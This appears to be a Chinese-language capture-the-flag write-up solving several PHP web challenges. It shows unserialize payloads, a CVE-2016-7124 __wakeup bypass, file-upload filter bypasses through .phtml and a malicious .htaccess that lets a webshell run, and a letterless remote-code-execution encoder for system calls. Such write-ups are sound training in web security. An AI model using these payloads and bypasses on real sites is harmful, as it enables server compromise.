ez_unserialize
不知道在哪,御剑扫叭
有一个robots.txt
一道反序列化好像是
分析代码应该是admin=admin、passwd=ctf即可输出flag
<?php
class wllm{
public $admin;
public $passwd;
public function __construct(){
$this->admin ="admin";
$this->passwd ="ctf";
}
}
$b = new wllm();
echo serialize($b);
?>
payload
O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}
NSSCTF{7ea69acb-a2a2-486b-b80a-877bf9e1cd0b}
easyupload1.0
只能是上传jpg好像
猜测应该是后端检验,那那那就抓包改后缀
!!!!
上传成功了哈哈哈
成功了哈哈哈哈
找到了
WLLMCTF{I_d0nt_w4nna_wak3up}
好像不对woc,,,
然后再phpinfo里面找到了flag
NSSCTF{f3f118bf-7cb6-41ea-a0db-2d629d241a81}
easyupload2.0
同样的方式上传php发现报错了
改成phtml成功绕过
连上了hhhh
NSSCTF{2cd21bdd-bf16-4308-9ed4-3e225945c53e}
no_wakeup
题目中提示是CVE-2016-7124
多了个__wakeup,得想办法绕过这个wakeup才能满足if当中得条件
经过查阅应该是将属性值改的大于原属性值即可绕过wakeup
<?php
class HaHaHa{
public $admin;
public $passwd;
public function __construct(){
$this->admin ="admin";
$this->passwd ="wllm";
}
}
$b = new HaHaHa();
echo serialize($b);
?>
生成payload
O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
修改为
O:6:"HaHaHa":4:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
NSSCTF{8d7c4c70-4187-46c2-85bc-b84b35e5ec61}
easyupload3.0
没啥办法上传.htaccess来解析1.jpg为php就行了
<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
同样上传webshell
可以
NSSCTF{ead0aa25-feab-4403-884b-931acb4d6226}
hardrce
明显是无字母rce
<?php
$system = 'system';
$command = 'ls';
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
采用取反的方法
发现可以执行
直接读取flag
NSSCTF{a6d5a9b9-96b0-4d75-afac-85cedb42b80f}